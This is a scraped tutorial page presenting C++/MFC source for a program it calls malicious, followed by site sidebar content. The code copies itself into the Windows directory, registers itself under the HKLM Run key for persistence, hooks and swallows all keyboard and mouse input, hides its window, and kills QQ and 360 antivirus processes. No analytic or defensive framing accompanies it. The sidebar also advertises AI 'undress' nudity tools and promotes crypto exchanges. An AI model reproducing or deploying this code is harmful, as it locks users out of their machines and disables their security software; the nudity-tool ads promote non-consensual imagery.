A malicious program_PHP tutorial
<span //</span><span KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span
#include </span><span "</span><span stdafx.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span
#include </span><tlhelp32.h><span
#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量,用于保存</span>
<span HHOOK g_hMouse;
HHOOK g_hKeyboard;
</span><span bool</span> isTrue = <span false</span><span ;
HWND hWnd; </span><span //</span><span 保存当前句柄
</span><span //</span><span 注意以下俩个钩子过程是全局函数,所以里面的API要用全局的</span>
<span LRESULT CALLBACK MouseProc(
</span><span int</span> nCode, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span message identifier</span>
LPARAM lParam <span //</span><span mouse coordinates</span>
<span )
{
</span><span return</span> <span 1</span><span ;
}
LRESULT CALLBACK KeyboardProc(
</span><span int</span> code, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span virtual-key code</span>
LPARAM lParam <span //</span><span keystroke-message information</span>
<span )
{
</span><span //</span><span if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
<span /*</span><span if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键
return 1;
else
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
<span //</span><span 留个后门,使当按下F2键时,程序将退</span>
<span if</span>(VK_F2 ==<span wParam)
{
</span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
</span><span //</span><span 卸载钩子</span>
<span UnhookWindowsHookEx(g_hMouse);
UnhookWindowsHookEx(g_hKeyboard);
}
</span><span return</span> <span 1</span><span ;
}
</span><span class</span> CAboutDlg : <span public</span><span CDialog
{
</span><span public</span><span :
CAboutDlg();
</span><span //</span><span Dialog Data
</span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
<span enum</span> { IDD =<span IDD_ABOUTBOX };
</span><span //</span><span }}AFX_DATA
</span><span //</span><span ClassWizard generated virtual function overridesf
</span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
<span protected</span><span :
</span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX); <span //</span><span DDX/DDV support
</span><span //</span><span }}AFX_VIRTUAL
</span><span //</span><span Implementation</span>
<span protected</span><span :
</span><span //</span><span {{AFX_MSG(CAboutDlg)
</span><span //</span><span }}AFX_MSG</span>
<span DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
</span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
</span><span //</span><span }}AFX_DATA_INIT</span>
<span }
</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
</span><span //</span><span No message handlers
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg dialog</span>
<span
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
: CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
</span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add member initialization here
</span><span //</span><span }}AFX_DATA_INIT
</span><span //</span><span Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}
</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add DDX and DDV calls here
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
ON_WM_TIMER()
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg message handlers</span>
<span
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
CDialog::OnInitDialog();
</span><span //</span><span Add "About..." menu item to system menu.
</span><span //</span><span IDM_ABOUTBOX must be in the system command range.</span>
ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );
CMenu</span>* pSysMenu =<span GetSystemMenu(FALSE);
</span><span if</span> (pSysMenu !=<span NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
</span><span if</span> (!<span strAboutMenu.IsEmpty())
{
pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
</span><span //</span><span Set the icon for this dialog. The framework does this automatically
</span><span //</span><span when the application's main window is not a dialog</span>
SetIcon(m_hIcon, TRUE); <span //</span><span Set big icon</span>
SetIcon(m_hIcon, FALSE); <span //</span><span Set small icon
</span><span //</span><span TODO: Add extra initialization here</span>
<span
CopySelf();
autoRun();</span><span //</span><span 注册表启动
</span><span //</span><span 设定钩子
</span><span //</span><span ShowProcess();</span>
g_hMouse =<span SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
g_hKeyboard </span>=<span SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
</span><span //</span><span 保存句柄</span>
hWnd =<span m_hWnd;
SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
isTrue </span>= <span true</span><span ;
</span><span return</span> TRUE; <span //</span><span return TRUE unless you set the focus to a control</span>
<span }
</span><span void</span><span CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
</span><span if</span> ((nID & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
</span><span else</span><span
{
CDialog::OnSysCommand(nID, lParam);
}
}
</span><span //</span><span If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span to draw the icon. For MFC applications using the document/view model,
</span><span //</span><span this is automatically done for you by the framework.</span>
<span void</span><span CKeyBoardHookDialogDlg::OnPaint()
{
</span><span if</span><span (IsIconic())
{
CPaintDC dc(</span><span this</span>); <span //</span><span device context for painting</span>
<span
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );
</span><span //</span><span Center icon in client rectangle</span>
<span int</span> cxIcon =<span GetSystemMetrics(SM_CXICON);
</span><span int</span> cyIcon =<span GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(</span>&<span rect);
</span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
</span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;
</span><span //</span><span Draw the icon</span>
<span dc.DrawIcon(x, y, m_hIcon);
}
</span><span else</span><span
{
CDialog::OnPaint();
}
}
</span><span //</span><span The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
</span><span return</span><span (HCURSOR) m_hIcon;
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnBtnHookon()
{
</span><span //</span><span TODO: Add your control notification handler code here</span>
<span
}
</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()
</span><span //</span><span DEL {
</span><span //</span><span DEL </span><span //</span><span TODO: Add your control notification handler code here
</span><span //</span><span DEL SetHookOff();
</span><span //</span><span DEL
</span><span //</span><span DEL }</span>
<span void</span><span CKeyBoardHookDialogDlg::hide()
{
ShowWindow(SW_HIDE);
}
</span><span void</span><span CKeyBoardHookDialogDlg::autoRun()
{
HKEY hKey </span>=<span NULL;
LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);
</span><span if</span>(lRet !=<span ERROR_SUCCESS)
{
</span><span return</span><span ;
}
RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));
RegCloseKey(hKey);
}
</span><span void</span><span CKeyBoardHookDialogDlg::ShowProcess()
{
HANDLE hSnap </span>=<span CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
</span><span //</span><span ...</span>
<span
PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
</span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
</span><span //</span><span 360IOSMgrSrv 360tray </span>
<span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
</span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
</span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
</span><span while</span><span (bRet)
{
</span><span //</span><span ...</span>
bRet = Process32Next(hSnap,&<span Pe32);
</span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl;</span>
<span int</span> flag = <span 0</span><span ;
</span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
flag </span>= <span 1</span><span ;
</span><span if</span><span (flag){
</span><span //</span><span cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span MessageBox(Pe32.szExeFile);
HANDLE hProcess </span>=<span OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
LPDWORD lpExitCode </span>= <span 0</span><span ;
GetExitCodeProcess(hProcess, lpExitCode);
TerminateProcess(hProcess, (UINT)lpExitCode);
}
}
}
</span><span void</span><span CKeyBoardHookDialogDlg::CopySelf()
{
</span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span char szSystemPath[MAX_PATH] = {0};</span>
<span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span 获取当前程序自身路径</span>
<span GetModuleFileName(NULL,szSelfName,MAX_PATH);
</span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;
</span><span //</span><span 获取系统目录</span>
<span GetWindowsDirectory(szWindowsPath,MAX_PATH);
</span><span //</span><span cout<<"szWindowsPath:"<<szWindowsPath<<endl;
</span><span //</span><span 获取windows目录
</span><span //</span><span GetSystemDirectory(szSystemPath,MAX_PATH);
</span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span
strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
</span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span
MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
</span><span //</span><span MessageBox( szSystemPath,": szSystemPath"); </span>
<span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
</span><span //</span><span int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
</span><span //</span><span TODO: Add your message handler code here and/or call default</span>
<span if</span><span (isTrue){
ShowWindow(SW_HIDE);
}
MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);
CDialog::OnTimer(nIDEvent);
}</span>
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to update the latest version of Bybit Exchange? Will there be any impact if it is not updated?
Feb 21, 2025 pm 10:54 PM
The way to update ByBit exchanges varies by platform and device: Mobile: Check for updates and install in the app store. Desktop Client: Check for updates in the Help menu and install automatically. Web page: You need to manually access the official website for updates. Failure to update the exchange can lead to security vulnerabilities, functional limitations, compatibility issues and reduced transaction execution efficiency.
deepseek web version entrance deepseek official website entrance
Feb 19, 2025 pm 04:54 PM
DeepSeek is a powerful intelligent search and analysis tool that provides two access methods: web version and official website. The web version is convenient and efficient, and can be used without installation; the official website provides comprehensive product information, download resources and support services. Whether individuals or corporate users, they can easily obtain and analyze massive data through DeepSeek to improve work efficiency, assist decision-making and promote innovation.
Pi Node Teaching: What is a Pi Node? How to install and set up Pi Node?
Mar 05, 2025 pm 05:57 PM
Detailed explanation and installation guide for PiNetwork nodes This article will introduce the PiNetwork ecosystem in detail - Pi nodes, a key role in the PiNetwork ecosystem, and provide complete steps for installation and configuration. After the launch of the PiNetwork blockchain test network, Pi nodes have become an important part of many pioneers actively participating in the testing, preparing for the upcoming main network release. If you don’t know PiNetwork yet, please refer to what is Picoin? What is the price for listing? Pi usage, mining and security analysis. What is PiNetwork? The PiNetwork project started in 2019 and owns its exclusive cryptocurrency Pi Coin. The project aims to create a one that everyone can participate
How to install deepseek
Feb 19, 2025 pm 05:48 PM
There are many ways to install DeepSeek, including: compile from source (for experienced developers) using precompiled packages (for Windows users) using Docker containers (for most convenient, no need to worry about compatibility) No matter which method you choose, Please read the official documents carefully and prepare them fully to avoid unnecessary trouble.
Coinsuper exchange software channel official website entrance
Feb 21, 2025 pm 10:39 PM
The official website entrance of the Coinsuper Exchange: https://www.coinsuper.com. The client download channels are: Windows client, macOS client, and mobile (iOS/Android). Registration requires an email, mobile phone number and password, and you need to complete real-name authentication before you can trade. The platform provides a variety of digital asset transactions, including Bitcoin, Ethereum, etc., with the transaction fee rate of 0.1% for both orders and acceptors. Security safeguards include cold wallet storage, dual-factor verification, anti-money laundering and anti-terrorism financing measures, and with security public
Ouyi okx installation package is directly included
Feb 21, 2025 pm 08:00 PM
Ouyi OKX, the world's leading digital asset exchange, has now launched an official installation package to provide a safe and convenient trading experience. The OKX installation package of Ouyi does not need to be accessed through a browser. It can directly install independent applications on the device, creating a stable and efficient trading platform for users. The installation process is simple and easy to understand. Users only need to download the latest version of the installation package and follow the prompts to complete the installation step by step.
BITGet official website installation (2025 beginner's guide)
Feb 21, 2025 pm 08:42 PM
BITGet is a cryptocurrency exchange that provides a variety of trading services including spot trading, contract trading and derivatives. Founded in 2018, the exchange is headquartered in Singapore and is committed to providing users with a safe and reliable trading platform. BITGet offers a variety of trading pairs, including BTC/USDT, ETH/USDT and XRP/USDT. Additionally, the exchange has a reputation for security and liquidity and offers a variety of features such as premium order types, leveraged trading and 24/7 customer support.
Get the gate.io installation package for free
Feb 21, 2025 pm 08:21 PM
Gate.io is a popular cryptocurrency exchange that users can use by downloading its installation package and installing it on their devices. The steps to obtain the installation package are as follows: Visit the official website of Gate.io, click "Download", select the corresponding operating system (Windows, Mac or Linux), and download the installation package to your computer. It is recommended to temporarily disable antivirus software or firewall during installation to ensure smooth installation. After completion, the user needs to create a Gate.io account to start using it.
